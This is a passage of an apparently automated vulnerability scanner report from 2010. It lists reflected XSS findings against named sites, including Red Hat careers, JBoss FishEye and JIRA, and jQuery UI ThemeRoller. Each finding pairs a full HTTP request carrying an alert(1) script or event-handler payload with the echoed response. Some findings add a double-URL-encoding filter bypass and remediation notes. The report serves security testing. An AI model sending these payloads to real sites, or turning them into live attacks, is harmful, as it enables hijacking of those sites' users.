HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=02f1d3d5df626107f402d4c973507e41; path=/
Set-Cookie: IG84196=84196%3A%3A02f1d3d5df626107f402d4c973507e41%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:01 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html
The value of the lsd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdf8"%3balert(1)//c8bc67fd179 was submitted in the lsd parameter. This input was echoed as cbdf8";alert(1)//c8bc67fd179 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Visit.php?vt=O&rid=84196364354717&chid=320&c=84196&kw=cloud%20computing&adid=5624934659&cid=1234&lsd=Googlecbdf8"%3balert(1)//c8bc67fd179&cta=Webmetrics%20Trial&_kk=cloud%20computing&_kt=612eff42-38f6-41ff-ac8e-5044b89f5890/x22 HTTP/1.1
Host: app.insightgrit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 09:33:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 15 Nov 2010 09:33:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=261d3b1eb577eedbf319cb38751a65ba; path=/
Set-Cookie: IG84196=84196%3A%3A261d3b1eb577eedbf319cb38751a65ba%3A%3A%3A%3A5624934659; expires=Fri, 14-Jan-2011 09:33:02 GMT; domain=app.insightgrit.com
p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT"
Content-Length: 1246
Connection: close
Content-Type: text/html
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 19f53<script>alert(1)</script>8e5491c7616 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /subscribe/post-json?u=daebe79d0098f97bb580d51a6&id=542001acb8&c=?19f53<script>alert(1)</script>8e5491c7616 HTTP/1.1
Host: boulevardr.us1.list-manage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 92
Connection: close
Content-Type: application/json; charset=utf-8
?19f53<script>alert(1)</script>8e5491c7616({"result":"error","msg":"Unable to send mail. "})
The value of the Category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64 was submitted in the Category parameter. This input was echoed as b1c66"><img src=a onerror=alert(1)>a58178b7e64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ext/search?act=list&Keyword=jboss&Category=b1c66"><img%20src%3da%20onerror%3dalert(1)>a58178b7e64&Location= HTTP/1.1
Host: careers.redhat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 16:11:26 GMT
Cache-Control: private
Content-Length: 50545
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSACDQST=DCDDAEJAIMGLODLBPBGPCBHA; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>redhat.com Careers</title> ...[SNIP]... <a href="/ext/search?act=list&Sortedby=SearchJobID&SortDir=Asc&Category=b1c66"><img src=a onerror=alert(1)>a58178b7e64&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius=" style="color:#ffffff;"> ...[SNIP]...
The value of the Category request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c76"-alert(1)-"5322cc6fab2 was submitted in the Category parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ext/search?act=list&Keyword=jboss&Category=d2c76"-alert(1)-"5322cc6fab2&Location= HTTP/1.1
Host: careers.redhat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 16:11:29 GMT
Cache-Control: private
Content-Length: 50329
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDSSACDQST=DDDDAEJAEJJHHICMKIIEIIPC; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>redhat.com Careers</title> ...[SNIP]... <script> function Submit_Query_Jtitle() { window.location= "/ext/search?act=list&Sortedby=JobTitle&SortDir=Asc&Category=d2c76"-alert(1)-"5322cc6fab2&Location=&Keyword=jboss&SearchJobID=&PostalCode=&DistanceUnit=&SearchRadius="; } function Submit_Query_Location() { window.location= "/ext/search?act=list&Sortedby=Location&SortDir=Asc&Category ...[SNIP]...
The value of the queryEncoded request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef39'%3balert(1)//6e03cdf3cdc was submitted in the queryEncoded parameter. This input was echoed as 6ef39';alert(1)//6e03cdf3cdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the emailAddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52342"><script>alert(1)</script>817de34b9e88d53ed was submitted in the emailAddress parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.
4.108. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://devoxx.com
Path: /display/Devoxx2K10/Home
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a8f51--><script>alert(1)</script>db69e0aef33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:25:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289841926516
Set-Cookie: JSESSIONID=20A4F26984442A3D698F78937A8D5972; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38262
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Home?a8f51--><script>alert(1)</script>db69e0aef33=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3ab9ffe0 adaptavist.builder.helper: com.atlass ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b95d<script>alert(1)</script>6a1369cd27b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr7b95d<script>alert(1)</script>6a1369cd27b HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Sun, 13 Feb 2011 06:29:43 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 15 Nov 2010 06:29:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Nov 2010 06:29:43 GMT
Connection: close
4.110. http://fisheye.jboss.org/browse [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fisheye.jboss.org
Path: /browse
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bf3"><script>alert(1)</script>2948a8d6823 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse?e5bf3"><script>alert(1)</script>2948a8d6823=1 HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://fisheye.jboss.org/browse/
Cookie: FESESSIONID=8s2yaeqmbqpv16w8nsad69bey; crucibleprefs1="D%3D1289838739500%3Bslp%3Dt";
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 18:39:41 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 33437
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
4.111. http://fisheye.jboss.org/browse/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fisheye.jboss.org
Path: /browse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e81b"><script>alert(1)</script>239ec7c39ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/?6e81b"><script>alert(1)</script>239ec7c39ac=1 HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 18:39:35 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 33439
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b was submitted in the REST URL parameter 2. This input was echoed as 1b441"><script>alert(1)</script>06c6c8f234b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /changelog/~feedspan1b441%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06c6c8f234b=1mo,feedmax=50/Seam HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:14 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 324712
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308 was submitted in the REST URL parameter 2. This input was echoed as a6f00"><script>alert(1)</script>e171f9e0308 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /changelog/~feedspana6f00%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee171f9e0308=1mo,feedmax=50/weld HTTP/1.1
Host: fisheye.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:35:17 GMT
Server: Jetty(6.1.24)
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 305553
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f was submitted in the REST URL parameter 1. This input was echoed as e0544"><img src=a onerror=alert(1)>be18d6c294f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /toolse0544"><img%20src%3da%20onerror%3dalert(1)>be18d6c294f/scrollable.html HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Mon, 15 Nov 2010 17:33:55 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Vary: Accept-Encoding
Cache-control: private
Content-Length: 5899
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="toolse0544"><img src=a onerror=alert(1)>be18d6c294f_scrollable" class="msie tools"> ...[SNIP]...
The value of the error request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84984</script><script>alert(1)</script>cd92040e158 was submitted in the error parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /account.php?page=login&error=84984</script><script>alert(1)</script>cd92040e158 HTTP/1.1
Host: home.vembu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vhbsc=bvvf4kfqpt8c7u7r1prvh56in2;
Response
HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 06:57:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="google-site-ve ...[SNIP]... display","none"); //$("#message").css("display","block"); // $("#message_container").css("position","static"); //$("#message").css("width","979px");
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f1ba"%3balert(1)//575707e5323 was submitted in the mpck parameter. This input was echoed as 9f1ba";alert(1)//575707e5323 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e733"%3balert(1)//2ab4c249393 was submitted in the mpvc parameter. This input was echoed as 5e733";alert(1)//2ab4c249393 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the keys request parameter is copied into the HTML document as plain text between tags. The payload 1f82f<script>alert(1)</script>d55a495333 was submitted in the keys parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the username request parameter is copied into the HTML document as plain text between tags. The payload 1bcd4<script>alert(1)</script>d253e6aeae3 was submitted in the username parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaffd"><script>alert(1)</script>539f0945265 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /secureaaffd"><script>alert(1)</script>539f0945265/QuickSearch.jspa HTTP/1.1
Host: jira.jboss.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=054235C303669934768F68853A63ADCC;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 14:30:44 GMT
Server: Apache-Coyote/1.1
X-AREQUESTID: 570x995774x1
X-ASESSIONID: 3jsbox
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-AUSERNAME: anonymous
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 124457
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c21"><script>alert(1)</script>e0a91ab37f6 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff63c21"><script>alert(1)</script>e0a91ab37f6&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1123d"><script>alert(1)</script>9442397b621 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee1123d"><script>alert(1)</script>9442397b621&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ede7"><script>alert(1)</script>8a535ef4e7f was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f63ede7"><script>alert(1)</script>8a535ef4e7f&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af686"><script>alert(1)</script>36e7921bdd9 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900af686"><script>alert(1)</script>36e7921bdd9&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42612"><script>alert(1)</script>8e5b70fa715 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
